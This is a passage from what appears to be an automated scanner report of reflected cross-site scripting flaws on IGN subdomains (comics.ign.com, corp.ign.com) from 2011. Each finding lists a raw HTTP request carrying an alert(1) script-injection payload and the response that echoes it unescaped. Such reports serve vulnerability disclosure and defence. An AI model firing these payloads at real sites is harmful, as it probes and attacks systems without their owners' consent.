...[SNIP]...
f _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/features.html?a5591"-alert(1)-"85de685ec3c=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.116. http://comics.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3494"><script>alert(1)</script>6da4e1145d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/features.html?a3494"><script>alert(1)</script>6da4e1145d3=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:29 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-12684-185091644-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:29 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041209547v-1n-12mc+1297041209547mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 133763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/features.html?a3494"><script>alert(1)</script>6da4e1145d3=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.117. http://comics.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e12"><script>alert(1)</script>fd0dd69bb47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/latest-updates.html?26e12"><script>alert(1)</script>fd0dd69bb47=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:40 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-509284073-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:12:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041160394v-1n-12mc+1297041160394mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 205880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/latest-updates.html?26e12"><script>alert(1)</script>fd0dd69bb47=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.118. http://comics.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd844"-alert(1)-"532e0e503d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/latest-updates.html?dd844"-alert(1)-"532e0e503d7=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:43 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-26296-1914995328-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:12:43 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041163126v-1n-12mc+1297041163126mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 205655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
scoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/latest-updates.html?dd844"-alert(1)-"532e0e503d7=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.119. http://comics.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f743c"-alert(1)-"59a7e92062 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/news.html?f743c"-alert(1)-"59a7e92062=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:24 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-455367217-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:24 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041204767v-1n-12mc+1297041204767mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 116870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/news.html?f743c"-alert(1)-"59a7e92062=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.120. http://comics.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45357"><script>alert(1)</script>80fbf9c206c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/news.html?45357"><script>alert(1)</script>80fbf9c206c=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:20 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32462-337093650-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:20 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041200624v-1n-12mc+1297041200624mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 119564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/news.html?45357"><script>alert(1)</script>80fbf9c206c=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.121. http://comics.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/podcasts.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4eda"><script>alert(1)</script>568cecf0a7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/podcasts.html?c4eda"><script>alert(1)</script>568cecf0a7f=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:32 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-78045477-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:32 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041212953v-1n-12mc+1297041212953mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 101963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/podcasts.html?c4eda"><script>alert(1)</script>568cecf0a7f=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.122. http://comics.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/podcasts.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdc00"-alert(1)-"07446334699 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/podcasts.html?cdc00"-alert(1)-"07446334699=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:35 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-23512-1065169981-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:35 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041215183v-1n-12mc+1297041215183mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 101901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
f _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/podcasts.html?cdc00"-alert(1)-"07446334699=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.123. http://comics.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/previews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5e29"-alert(1)-"3374167ff6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/previews.html?e5e29"-alert(1)-"3374167ff6c=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:31 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-485-83747499-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041211111v-1n-12mc+1297041211111mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 116837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
f _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/previews.html?e5e29"-alert(1)-"3374167ff6c=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.124. http://comics.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/previews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd37a"><script>alert(1)</script>ee03f7035cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/previews.html?dd37a"><script>alert(1)</script>ee03f7035cf=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:28 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13836-624763089-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:28 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041208386v-1n-12mc+1297041208386mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/previews.html?dd37a"><script>alert(1)</script>ee03f7035cf=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.125. http://comics.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a086"-alert(1)-"d310eae1459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/reviews.html?2a086"-alert(1)-"d310eae1459=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:25 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Content-Length: 6018
Set-Cookie: NGUserID=a016c04-12684-928941446-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:25 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041205321v-1n-12mc+1297041205321mv+1mn+12wwe~0;Path=/;Domain=.ign.com

<!-- stitial !-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
== '') {
docTitle = defaultContinueTo;
}
document.write(docTitle);
}

   function goBackToReferer(){
       document.location.href = "http://comics.ign.com/index/reviews.html?2a086"-alert(1)-"d310eae1459=1";
return true;
   
   }
   setTimeout('goBackToReferer()',18000);
</script>
...[SNIP]...

1.126. http://comics.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd10"><script>alert(1)</script>e21466306a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/reviews.html?1fd10"><script>alert(1)</script>e21466306a4=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:20 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-27912-98585012-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:20 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041200983v-1n-12mc+1297041200983mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/reviews.html?1fd10"><script>alert(1)</script>e21466306a4=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.127. http://comics.ign.com/index/toys.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/toys.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbf36"><script>alert(1)</script>8946fdfb18e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/toys.html?cbf36"><script>alert(1)</script>8946fdfb18e=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:30 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-24030-2034342565-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:30 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041210655v-1n-12mc+1297041210655mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 107472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/toys.html?cbf36"><script>alert(1)</script>8946fdfb18e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.128. http://comics.ign.com/index/toys.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/toys.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 764dc"-alert(1)-"0f054e9b56a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/toys.html?764dc"-alert(1)-"0f054e9b56a=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:32 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15003-101757157-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:32 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041212696v-1n-12mc+1297041212696mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 107402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/toys.html?764dc"-alert(1)-"0f054e9b56a=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.129. http://corp.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b7ed"><script>alert(1)</script>f5dfe5b827b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9b7ed"><script>alert(1)</script>f5dfe5b827b=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:05 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-19918-1031545857-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:05 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041245432v-1n-12mc+1297041245432mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 41813

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
